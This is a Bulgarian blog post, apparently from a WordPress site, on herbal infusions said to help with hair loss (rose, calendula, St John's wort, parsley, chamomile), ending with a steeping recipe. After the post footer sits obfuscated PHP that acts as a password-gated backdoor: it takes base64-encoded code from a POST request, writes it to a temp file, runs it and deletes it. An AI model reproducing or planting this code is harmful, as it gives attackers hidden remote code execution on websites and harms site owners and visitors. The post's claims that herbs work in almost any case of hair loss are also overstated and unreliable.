Настойка от билки при косопад | Косопад

Билкови отвари при косопад

билки и косопад

Билките са силно средство при косопад

Настойките от билки са отлично козметично средство при изморена, повехнала, лошо кръвоснабдена и суха коса. Те действат превъзходно при почти всякакви случаи на косопад, като почистват клетките и подобряват кръвообращението. Също така освежават, тонизират и успокояват възпалените места по скалпа.

Използването на билки увеличава възможностите на тялото за автозащита и самолечение, разширяват кръвоносните съдове. Като цяло те са лесно, евтино и достъпно средство за лечение на косопад. Необходимо е обаче да се познава действието на различните полезни треви и да се избират подходящите видове. Ето действието на няколко често прилагани билки в домашната козметика.

Листа от роза

Красивите цветове на розата тонизират, изглаждат и успокояват кожата на главата, което ги прави доста полезни за третиране като превенция на косопад.

Невен

Невенът също има уникални свойства в борбата с косопад. Той действа успокояващо, противовъзпалително, против пърхут и дезинфекционно. Притежава и лечебни свойства, прилага се при всякакви проблеми с косата.

Жълт кантарион

Тази билка почиства, донякъде изсветлява и освежава косата. Притежава епителотонично и изключително силно лечебно действие. Прилага се при мазна и бързо изтощаваща се коса, като я подхранва и стимулира растежа.

Магданоз

Магданозът действа противовъзпалително при косопад, успокоява кожата и подобрява кръвообращението. Полезен е при изтощена коса, добре е да се приема и вътрешно в пресен вид.

Лайка

Лайката е една от най – полезните билки при косопад. Тя почиства, успокоява и действа противовъзпалително при всякакви проблеми с косата. Хубаво е да третирате ежедневно и настойчиво, за постигане на дълготраен резултат.

Най – голям ефект се постига, като преди третиране срещу косопад от цветовете се прави запарка. За целта се взема около 50 грама от избраната билка и се поставя в подходящ съд, след което се залива с около 500 грама вряща вода. Покрива се с капак и се изчаква да се запари поне петнадесет минути. След това предварително почистената коса се изплаква внимателно с отварата, препоръчително е да се прави и лек масаж.

01. май 2013 22:34:23 от Косопад
Категории: Рецепти при косопад | Етикети: , | 45 коментари

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}